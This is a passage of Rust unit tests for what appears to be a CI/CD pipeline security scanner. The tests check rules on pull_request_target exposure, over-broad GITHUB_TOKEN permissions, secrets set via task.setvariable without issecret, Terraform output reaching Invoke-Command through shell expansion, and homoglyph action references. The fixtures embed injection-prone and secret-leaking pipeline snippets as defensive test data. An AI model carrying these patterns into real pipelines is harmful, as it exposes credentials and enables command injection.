10012            findings[0].severity,
10013            Severity::Info,
10014            "checkout in a job with no privileged steps must downgrade to Info"
10015        );
10016        assert!(findings[0].message.contains("downgraded"));
10017    }
10018
10019    #[test]
10020    fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
10021        let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
10022        g.metadata
10023            .insert(META_TRIGGER.into(), "pull_request_target".into());
10024        let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
10025        let checkout = step_with_meta(
10026            &mut g,
10027            "build[0]",
10028            &[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
10029        );
10030        let priv_step = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
10031        g.add_edge(priv_step, secret, EdgeKind::HasAccessTo);
10032        // checkout step itself has no edges
10033        let _ = checkout;
10034
10035        let mut findings = checkout_self_pr_exposure(&g);
10036        assert_eq!(findings.len(), 1);
10037        let pre = findings[0].severity;
10038        apply_compensating_controls(&g, &mut findings);
10039        assert_eq!(
10040            findings[0].severity, pre,
10041            "must NOT downgrade when same job has privileged steps"
10042        );
10043    }
10044
10045    #[test]
10046    fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
10047        // pull_request_target trigger + every privileged step has fork-check.
10048        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10049        g.metadata
10050            .insert(META_TRIGGER.into(), "pull_request_target".into());
10051        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10052        let s = step_with_meta(
10053            &mut g,
10054            "build[0]",
10055            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10056        );
10057        g.add_edge(s, secret, EdgeKind::HasAccessTo);
10058
10059        let mut findings = trigger_context_mismatch(&g);
10060        assert_eq!(findings.len(), 1);
10061        assert_eq!(findings[0].severity, Severity::Critical);
10062        apply_compensating_controls(&g, &mut findings);
10063        assert_eq!(
10064            findings[0].severity,
10065            Severity::Medium,
10066            "trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
10067        );
10068        assert!(findings[0].message.contains("downgraded"));
10069    }
10070
10071    #[test]
10072    fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
10073        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10074        g.metadata
10075            .insert(META_TRIGGER.into(), "pull_request_target".into());
10076        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10077        let s_guard = step_with_meta(
10078            &mut g,
10079            "build[0]",
10080            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10081        );
10082        let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
10083        g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
10084        g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
10085
10086        let mut findings = trigger_context_mismatch(&g);
10087        let pre = findings[0].severity;
10088        apply_compensating_controls(&g, &mut findings);
10089        assert_eq!(findings[0].severity, pre);
10090    }
10091
10092    #[test]
10093    fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
10094        // Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
10095        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
10096        let mut wf_meta = std::collections::HashMap::new();
10097        wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
10098        wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
10099        let wf_token = g.add_node_with_metadata(
10100            NodeKind::Identity,
10101            "GITHUB_TOKEN",
10102            TrustZone::FirstParty,
10103            wf_meta,
10104        );
10105        let mut job_meta = std::collections::HashMap::new();
10106        job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
10107        job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
10108        g.add_node_with_metadata(
10109            NodeKind::Identity,
10110            "GITHUB_TOKEN (build)",
10111            TrustZone::FirstParty,
10112            job_meta,
10113        );
10114        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
10115        g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
10116
10117        let mut findings = over_privileged_identity(&g);
10118        // Filter to only the workflow-level finding (the constrained job-level
10119        // override won't fire over_privileged_identity by itself).
10120        let wf_findings_count = findings
10121            .iter()
10122            .filter(|f| {
10123                f.nodes_involved
10124                    .first()
10125                    .and_then(|id| g.node(*id))
10126                    .map(|n| n.name == "GITHUB_TOKEN")
10127                    .unwrap_or(false)
10128            })
10129            .count();
10130        assert_eq!(wf_findings_count, 1);
10131        apply_compensating_controls(&g, &mut findings);
10132        let demoted = findings.iter().find(|f| {
10133            f.nodes_involved
10134                .first()
10135                .and_then(|id| g.node(*id))
10136                .map(|n| n.name == "GITHUB_TOKEN")
10137                .unwrap_or(false)
10138        });
10139        let demoted = demoted.expect("workflow-level token finding still present");
10140        assert_eq!(
10141            demoted.severity,
10142            Severity::Info,
10143            "workflow-level over_priv must downgrade to Info when narrower job override exists"
10144        );
10145        assert!(demoted.message.contains("suppressed"));
10146    }
10147
10148    #[test]
10149    fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
10150        // Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
10151        // a context with no shell-expansion sigils (no bash -c, no eval,
10152        // no Invoke-Command, no -split, no command substitution, not
10153        // line-leading). The value is quoted by the shell on its way
10154        // into echo's argv and never reaches an interpreter.
10155        let mut g = AuthorityGraph::new(source("ado.yml"));
10156        add_script_step_in_job(
10157            &mut g,
10158            "capture",
10159            "deploy",
10160            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10161        );
10162        add_script_step_in_job(
10163            &mut g,
10164            "safe-echo",
10165            "deploy",
10166            "echo \"gdsvms is: $(gdsvms)\"",
10167        );
10168
10169        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10170        assert!(
10171            findings.is_empty(),
10172            "properly-quoted echo must not fire; got: {findings:#?}"
10173        );
10174    }
10175
10176    #[test]
10177    fn tf_output_setvariable_skips_when_sink_in_different_job() {
10178        // Capture and sink exist, but in different jobs. Pipeline
10179        // variable scoping in ADO is per-stage/per-job by default — the
10180        // chain doesn't compose without explicit cross-job output
10181        // wiring (which is a separate primitive).
10182        let mut g = AuthorityGraph::new(source("ado.yml"));
10183        add_script_step_in_job(
10184            &mut g,
10185            "capture",
10186            "job-a",
10187            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10188        );
10189        add_script_step_in_job(
10190            &mut g,
10191            "consume",
10192            "job-b",
10193            "$names = \"$(gdsvms)\" -split \",\"\n\
10194             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10195        );
10196
10197        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10198        assert!(
10199            findings.is_empty(),
10200            "cross-job chain must not fire; got: {findings:#?}"
10201        );
10202    }
10203
10204    #[test]
10205    fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
10206        // Inline script emits `task.setvariable` but the source value is
10207        // a plain pipeline variable, not anything terraform-shaped.
10208        // Without a TF_OUT_* / `terraform output` capture signal in the
10209        // body, the rule must not fire — `self_mutating_pipeline`
10210        // already covers the generic setvariable primitive.
10211        let mut g = AuthorityGraph::new(source("ado.yml"));
10212        add_script_step_in_job(
10213            &mut g,
10214            "pure-setvar",
10215            "deploy",
10216            "Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
10217        );
10218        add_script_step_in_job(
10219            &mut g,
10220            "consume",
10221            "deploy",
10222            "$names = \"$(gdsvms)\" -split \",\"\n\
10223             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10224        );
10225
10226        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10227        assert!(
10228            findings.is_empty(),
10229            "setvariable without terraform-output signal must not fire; got: {findings:#?}"
10230        );
10231    }
10232
10233    // ── setvariable_issecret_false ──────────────────────────
10234
10235    /// Helper: create an ADO-platform graph with a single Step whose
10236    /// `META_SCRIPT_BODY` is set to the given script.
10237    fn ado_graph_with_script(script: &str) -> AuthorityGraph {
10238        let mut g = graph_with_platform("azure-devops", "ado-pipeline.yml");
10239        let mut meta = std::collections::HashMap::new();
10240        meta.insert(META_SCRIPT_BODY.into(), script.into());
10241        g.add_node_with_metadata(NodeKind::Step, "script-step", TrustZone::FirstParty, meta);
10242        g
10243    }
10244
10245    #[test]
10246    fn setvariable_issecret_false_fires_on_explicit_false() {
10247        let g = ado_graph_with_script(
10248            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=false]$(token)""###,
10249        );
10250        let findings = setvariable_issecret_false(&g);
10251        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10252        assert_eq!(findings[0].severity, Severity::High);
10253        assert_eq!(
10254            findings[0].category,
10255            FindingCategory::SetvariableIssecretFalse
10256        );
10257        assert!(findings[0].message.contains("MY_TOKEN"));
10258    }
10259
10260    #[test]
10261    fn setvariable_issecret_false_skips_issecret_true() {
10262        let g = ado_graph_with_script(
10263            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=true]$(token)""###,
10264        );
10265        let findings = setvariable_issecret_false(&g);
10266        assert!(
10267            findings.is_empty(),
10268            "issecret=true must not fire; got: {findings:#?}"
10269        );
10270    }
10271
10272    #[test]
10273    fn setvariable_issecret_false_skips_non_sensitive_name() {
10274        let g = ado_graph_with_script(
10275            r###"echo "##vso[task.setvariable variable=BUILD_NUMBER]$(rev)""###,
10276        );
10277        let findings = setvariable_issecret_false(&g);
10278        assert!(
10279            findings.is_empty(),
10280            "non-sensitive name must not fire; got: {findings:#?}"
10281        );
10282    }
10283
10284    #[test]
10285    fn setvariable_issecret_false_fires_when_flag_omitted() {
10286        let g = ado_graph_with_script(
10287            r###"echo "##vso[task.setvariable variable=DB_PASSWORD]$(db_pass)""###,
10288        );
10289        let findings = setvariable_issecret_false(&g);
10290        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10291        assert!(findings[0].message.contains("DB_PASSWORD"));
10292    }
10293
10294    #[test]
10295    fn keyvaultname_does_not_fire() {
10296        // "key" is a substring of "keyvaultname" but not a token — must not fire.
10297        let g = ado_graph_with_script(
10298            r###"echo "##vso[task.setvariable variable=KEYVAULTNAME]my-vault""###,
10299        );
10300        let findings = setvariable_issecret_false(&g);
10301        assert!(
10302            findings.is_empty(),
10303            "keyvaultname must not fire (FP regression); got: {findings:#?}"
10304        );
10305    }
10306
10307    #[test]
10308    fn storage_account_key_still_fires() {
10309        // "key" is an exact token in "STORAGE_ACCOUNT_KEY" — must still fire.
10310        let g = ado_graph_with_script(
10311            r###"echo "##vso[task.setvariable variable=STORAGE_ACCOUNT_KEY]secret""###,
10312        );
10313        let findings = setvariable_issecret_false(&g);
10314        assert_eq!(
10315            findings.len(),
10316            1,
10317            "STORAGE_ACCOUNT_KEY must fire; got: {findings:#?}"
10318        );
10319        assert!(findings[0].message.contains("STORAGE_ACCOUNT_KEY"));
10320    }
10321
10322    #[test]
10323    fn github_author_email_does_not_fire() {
10324        // "auth" is a substring of "author" but not a token — must not fire.
10325        let g = ado_graph_with_script(
10326            r###"echo "##vso[task.setvariable variable=GITHUB_AUTHOR_EMAIL]user@example.com""###,
10327        );
10328        let findings = setvariable_issecret_false(&g);
10329        assert!(
10330            findings.is_empty(),
10331            "GITHUB_AUTHOR_EMAIL must not fire (FP regression); got: {findings:#?}"
10332        );
10333    }
10334
10335    #[test]
10336    fn cert_thumbprint_still_fires() {
10337        // "cert" is an exact token in "CERT_THUMBPRINT" — must still fire.
10338        let g = ado_graph_with_script(
10339            r###"echo "##vso[task.setvariable variable=CERT_THUMBPRINT]abc123""###,
10340        );
10341        let findings = setvariable_issecret_false(&g);
10342        assert_eq!(
10343            findings.len(),
10344            1,
10345            "CERT_THUMBPRINT must fire; got: {findings:#?}"
10346        );
10347        assert!(findings[0].message.contains("CERT_THUMBPRINT"));
10348    }
10349
10350    // ── homoglyph_in_action_ref ──────────────────────────────────
10351
10352    fn gha_graph_with_action(action: &str) -> AuthorityGraph {
10353        let mut g = AuthorityGraph::new(source("ci.yml"));
10354        g.metadata
10355            .insert(META_PLATFORM.into(), "github-actions".into());
10356        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
10357        g
10358    }
10359
10360    #[test]
10361    fn pure_ascii_action_ref_not_flagged() {
10362        let g = gha_graph_with_action("actions/checkout@v4");
10363        let findings = check_homoglyph_in_action_ref(&g);
10364        assert!(
10365            findings.is_empty(),
10366            "pure ASCII action ref must not fire; got: {findings:#?}"
10367        );
10368    }
10369
10370    #[test]
10371    fn division_slash_homoglyph_flagged() {
10372        // U+2215 DIVISION SLASH instead of U+002F SOLIDUS
10373        let g = gha_graph_with_action("actions\u{2215}checkout@v4");
10374        let findings = check_homoglyph_in_action_ref(&g);
10375        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10376        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10377        assert_eq!(findings[0].severity, Severity::High);
10378        assert!(findings[0].message.contains("U+2215"));
10379    }
10380
10381    #[test]
10382    fn cyrillic_a_homoglyph_flagged() {
10383        // Cyrillic small letter a (U+0430) instead of Latin a (U+0061)
10384        let g = gha_graph_with_action("\u{0430}ctions/checkout@v4");
10385        let findings = check_homoglyph_in_action_ref(&g);
10386        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10387        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10388        assert!(findings[0].message.contains("U+0430"));
10389    }
10390
10391    #[test]
10392    fn homoglyph_rule_skips_non_gha_platform() {
10393        let mut g = AuthorityGraph::new(source("ado.yml"));
10394        g.metadata
10395            .insert(META_PLATFORM.into(), "azure-devops".into());
10396        g.add_node(
10397            NodeKind::Image,
10398            "\u{0430}ctions/checkout@v4",
10399            TrustZone::ThirdParty,
10400        );
10401        let findings = check_homoglyph_in_action_ref(&g);
10402        assert!(
10403            findings.is_empty(),
10404            "non-GHA platform must not fire; got: {findings:#?}"
10405        );
10406    }
10407}